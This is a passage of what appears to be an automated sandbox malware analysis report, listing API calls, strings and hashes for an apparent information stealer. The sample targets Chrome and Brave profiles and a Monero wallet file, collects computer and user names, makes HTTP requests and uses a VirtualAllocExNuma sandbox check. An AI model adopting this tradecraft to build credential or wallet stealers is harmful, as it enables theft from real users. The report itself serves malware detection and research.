                              • Opcode Fuzzy Hash: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                              • Instruction Fuzzy Hash: 3A016DB4D40309BBEB10EFE4CC4AB9EBBB8EB14705F248048E705B62C0D77495418BAD

                              Control-flow Graph

                              • Basic blocks: d46af3; d46b0a; d46b0c-d46b22 (call d46920, call d45b10, CloseHandle, ExitProcess); d46aba-d46ad7 (call d4aad0, OpenEventA); d46af5-d46b04 (CloseHandle, Sleep); d46ad9-d46af1 (call d4aad0, CreateEventA)
                              • Edges: d46af3 -> d46b0a; d46b0a -> d46b0c, d46aba; d46aba -> d46af5, d46ad9; d46af5 -> d46b0a; d46ad9 -> d46b0c
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                              • Sleep.KERNEL32(00001770), ref: 00D46B04
                              • CloseHandle.KERNEL32(?,00000000,?,008D8950,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                              • ExitProcess.KERNEL32 ref: 00D46B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                              • Instruction ID: 59aa43c63c7ee39f69ae1c226f20b9de7e2c9da13724a7b908c72b56e9f0f064
                              • Opcode Fuzzy Hash: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                              • Instruction Fuzzy Hash: 2CF0F870A4021DABE710ABA0EC0ABBE7B74EB45741F104914B517A51D1DBB09981EAB7

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: bbf36d8bff453a2f91040dc1741a91bc0b46df68abb75153e671e100c3e85662
                              • Instruction ID: e63994291cbe937ad78a9cde828228de7137ad8415b9571f68e01a47faf2b034
                              • Opcode Fuzzy Hash: bbf36d8bff453a2f91040dc1741a91bc0b46df68abb75153e671e100c3e85662
                              • Instruction Fuzzy Hash: 08213EB1D00209ABDF14DFA5EC46ADE7B75FB44320F108625F915A7291EB706A0ACB91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                                • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36303
                                • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                                • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D36385
                                • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                                • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                              • Instruction ID: 764bd7c76c9df298beea16992475230983d77ab0f1c116ae9595639995102b61
                              • Opcode Fuzzy Hash: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                              • Instruction Fuzzy Hash: E8110030954148ABEB14FF68DD92AED7338EF50300F404558F81A5B592EF70AB09CAB2
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                              • ExitProcess.KERNEL32 ref: 00D31143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                              • Instruction ID: 78bf702b8287c4b18e53dd94d146ac6fd80ad8351d97ec3d6e98eef1e5a61048
                              • Opcode Fuzzy Hash: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                              • Instruction Fuzzy Hash: 65E0E67494530CFBE7546BA09D0AB4D7678EB44B02F104054F70D761D0D6B52645A6AB
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D310B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D310F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                              • Instruction ID: 11e0e3d7fbcea94212452629efdedc49435f015b9b9677f19bfb505cff357a93
                              • Opcode Fuzzy Hash: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                              • Instruction Fuzzy Hash: 74F0E2B1641208BBEB189AA4AC49FAEB7E8E705B15F301448F504E7280D5719E40DAA1
                              APIs
                                • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                                • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                                • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                                • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                                • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                                • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                              • ExitProcess.KERNEL32 ref: 00D311C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                              • Instruction ID: e3e843ae15def6141d413976fb969309e0f37740074ae3ff6a8edbdf569a14ff
                              • Opcode Fuzzy Hash: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                              • Instruction Fuzzy Hash: 48E012B591430653CB0477B0BC0BB2E329C9B54786F080824FA09D2102FA65E8419677
                              APIs
                              • wsprintfA.USER32 ref: 00D438CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D438E3
                              • lstrcat.KERNEL32(?,?), ref: 00D43935
                              • StrCmpCA.SHLWAPI(?,00D50F70), ref: 00D43947
                              • StrCmpCA.SHLWAPI(?,00D50F74), ref: 00D4395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D43C67
                              • FindClose.KERNEL32(000000FF), ref: 00D43C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                              • Instruction ID: b81db80f167c0bea1ab0dd2317f57e6ad2de6fc1ea852b9853646a60d129e95e
                              • Opcode Fuzzy Hash: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                              • Instruction Fuzzy Hash: E6A110B1940218ABDB24EBA4DC85FEE7778FF88301F084588A54D96141EB759B89CF72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00D50B32,00D50B2B,00000000,?,?,?,00D513F4,00D50B2A), ref: 00D3BEF5
                              • StrCmpCA.SHLWAPI(?,00D513F8), ref: 00D3BF4D
                              • StrCmpCA.SHLWAPI(?,00D513FC), ref: 00D3BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3C7BF
                              • FindClose.KERNEL32(000000FF), ref: 00D3C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                              • Instruction ID: 3c3fed2af970b7db027af52e9ecf5926c51ce0ea19e14420cf2d7dabdc253b56
                              • Opcode Fuzzy Hash: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                              • Instruction Fuzzy Hash: 91425272950108ABEB14FB74DD96EED737DEF84300F404558B90AA6191EF34AB49CBB2
                              APIs
                              • wsprintfA.USER32 ref: 00D4492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                              • StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                              • StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                              • FindClose.KERNEL32(000000FF), ref: 00D44B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                              • Instruction ID: f41693a96c25863472d8cda70152a35a312fb903aabd21f80330b76a99c55f56
                              • Opcode Fuzzy Hash: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                              • Instruction Fuzzy Hash: 3B6113B2500219ABCB24EBA0DC45FEE777CFB88701F044588A54D96141EA75DB89DFB2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                              • wsprintfA.USER32 ref: 00D445A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                              • StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D445EB
                              • StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4468B
                              • FindClose.KERNEL32(000000FF), ref: 00D446A0
                              • lstrcat.KERNEL32(?,008DE520), ref: 00D446C5
                              • lstrcat.KERNEL32(?,008DD318), ref: 00D446D8
                              • lstrlen.KERNEL32(?), ref: 00D446E5
                              • lstrlen.KERNEL32(?), ref: 00D446F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                              • Instruction ID: 5d0c93162240e45786f785c40a0b0f445cef3b4ead4e96500cf346ad269c0dc4
                              • Opcode Fuzzy Hash: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                              • Instruction Fuzzy Hash: 8B5121B654021CABCB24EB70DC89FED777CAB98701F404588B60D96190EB749AC59FB2
                              APIs
                              • wsprintfA.USER32 ref: 00D43EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D43EDA
                              • StrCmpCA.SHLWAPI(?,00D50FAC), ref: 00D43F08
                              • StrCmpCA.SHLWAPI(?,00D50FB0), ref: 00D43F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4406C
                              • FindClose.KERNEL32(000000FF), ref: 00D44081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
